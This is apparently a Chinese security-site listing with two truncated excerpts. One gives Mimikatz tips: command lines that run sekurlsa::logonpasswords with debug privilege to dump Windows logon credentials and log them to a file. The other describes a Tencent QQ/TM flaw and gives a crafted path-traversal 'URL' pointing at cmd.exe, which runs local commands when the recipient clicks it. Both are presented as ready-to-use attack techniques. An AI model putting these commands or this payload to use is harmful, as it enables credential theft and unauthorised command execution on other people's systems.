Mimikatz 使用小技巧
1.记录 Mimikatz输出: C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full...
腾讯TM、QQ远程命令执行漏洞 点开QQ消息 执行本地文件命令!
当用户发送此类格式“网址”的时候: www.webshell.cc..\..\..\..\..\..\..\Windows\System32\cmd.exe 对方接收之后,点击鼠标左键打开该网址的时候,会被当成路径打开,从而可以恶意执行一些程序、系统命令,造成严重安全隐患。 漏洞原理很简单,不解释了…… 条件如下: 1、不能 url 编码,只能明文,囧rz…… 2、不能...